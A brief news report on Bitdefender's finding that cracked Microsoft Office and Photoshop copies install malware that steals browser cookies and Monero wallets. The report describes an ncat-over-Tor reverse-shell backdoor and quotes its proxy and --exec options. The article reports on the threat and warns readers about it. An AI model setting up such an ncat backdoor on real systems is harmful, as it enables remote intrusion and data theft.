Bitdefender experts warned that hacked copies of Microsoft Office and Adobe Photoshop steal cookies and Monero cryptocurrency wallet data from users who install pirated software.
Experts write that some pirated versions of both programs are “equipped” with malware that steals browser session cookies (in the case of Firefox, generally the entire user’s profile history), hijacks Monero cryptocurrency wallets and extracts other data via BitTorrent, after opening the backdoor on the target machine and by disabling the firewall.
Thus, once launched, the cracked program installs an instance of ncat.exe (a legitimate tool for sending raw data over the network) and uses the chknap.bat batch file as well as the Tor proxy.
“These tools work together to create a powerful backdoor that communicates with the C&C server over Tor: the ncat binary listens on the Tor proxy port (–proxy 127.0.0.1:9075) and uses the –exec option to send all input from the client to the application, and the responses are sent back to the client via the socket (normal reverse shell behavior), ”the researchers said.
It takes quite a long time for the malware operators behind this attack to analyze the environment they compromise and decide what is worth stealing. Analysts believe that the theft of the entire Firefox profile was more accidental than intentional, and any other browser installed on the device would be fine.
ProApk on Telegram – https://t.me/proapk_in
ProApk on Google News – https://news.google.com/publications/CAAqBwgKMP_S9AowhYDbAg
ProApk on Twitter – https://twitter.com/xdapirates
ProApk on Facebook – https://facebook.com/www.proapk.in